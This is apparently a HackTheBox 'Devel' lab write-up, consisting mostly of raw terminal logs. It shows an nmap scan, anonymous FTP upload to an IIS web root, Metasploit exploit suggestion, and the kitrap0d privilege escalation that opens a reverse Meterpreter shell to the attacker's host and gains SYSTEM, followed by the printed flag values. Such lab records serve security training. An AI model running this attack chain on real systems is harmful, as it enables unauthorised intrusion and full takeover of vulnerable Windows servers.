HTB-Devel笔记

# nmap -sC -sV -T5 -Pn 10.10.10.5  Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 10:09 CSTStats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 41.00% done; ETC: 10:12 (0:01:26 remaining)Nmap scan report for 10.10.10.5Host is up (0.32s latency).Not shown: 998 filtered tcp ports (no-response)PORT   STATE SERVICE VERSION21/tcp open  ftp     Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-18-17  02:06AM       <DIR>          aspnet_client| 07-20-23  02:24AM                 2779 backup.aspx| 03-17-17  05:37PM                  689 iisstart.htm| 07-20-23  05:07AM       <DIR>          PSVIYDJQWP| 07-20-23  05:10AM       <DIR>          QCBEIJECBS| 07-20-23  03:07AM                 2764 reverse-shell.aspx| 03-17-17  05:37PM               184946 welcome.png|_07-20-23  05:08AM       <DIR>          XCUBJAZTJO| ftp-syst: |_  SYST: Windows_NT80/tcp open  http    Microsoft IIS httpd 7.5|_http-server-header: Microsoft-IIS/7.5|_http-title: IIS7| http-methods: |_  Potentially risky methods: TRACEService Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# ftp 10.10.10.5                            Connected to 10.10.10.5.220 Microsoft FTP ServiceName (10.10.10.5:uu): anonymous331 Anonymous access allowed, send identity (e-mail name) as password.Password: 230 User logged in.Remote system type is Windows_NT.ftp> ls229 Entering Extended Passive Mode (|||49173|)125 Data connection already open; Transfer starting.03-18-17  02:06AM       <DIR>          aspnet_client07-20-23  02:24AM                 2779 backup.aspx03-17-17  05:37PM                  689 iisstart.htm07-20-23  05:07AM       <DIR>          PSVIYDJQWP07-20-23  05:10AM       <DIR>          QCBEIJECBS07-20-23  03:07AM                 2764 reverse-shell.aspx03-17-17  05:37PM               184946 welcome.png07-20-23  05:08AM       <DIR>          XCUBJAZTJO226 Transfer complete.ftp>

ftp> put 43809.txtlocal: 43809.txt remote: 43809.txt229 Entering Extended Passive Mode (|||49177|)125 Data connection already open; Transfer starting.100% |****************************************************************************************************************************************************************|  9260        7.00 MiB/s    --:-- ETA226 Transfer complete.9260 bytes sent in 00:00 (14.40 KiB/s)ftp>

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1SESSION => 1msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...[*] 10.10.10.5 - 186 exploit checks are being tried...[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.[*] Running check method for exploit 41 / 41[*] 10.10.10.5 - Valid modules for session 1:============================
 #   Name                                                           Potentially Vulnerable?  Check Result -   ----                                                           -----------------------  ------------ 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable. 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated. 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated. 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable. 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable. 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable. 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated. 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable. 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated. 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated. 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable. 12  exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable. 13  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable. 14  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable. 15  exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability. 16  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable. 17  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1SESSION => 1msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0LHOST => 10.10.14.13msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.13:4444 [*] Reflectively injecting payload and triggering the bug...[*] Launching msiexec to host the DLL...[+] Process 3484 launched.[*] Reflectively injecting the DLL into 3484...[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Sending stage (175686 bytes) to 10.10.10.5[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.5:49185) at 2023-07-20 11:07:31 +0800
meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter >

C:UsersAdministratorDesktop>type root.txttype root.txt1853a1ab16f22c3fab3add344514206c
C:UsersAdministratorDesktop>type C:UsersbabisDesktopuser.txttype C:UsersbabisDesktopuser.txtbea0bc15edb5724527ff82fe17e2113d
C:UsersAdministratorDesktop>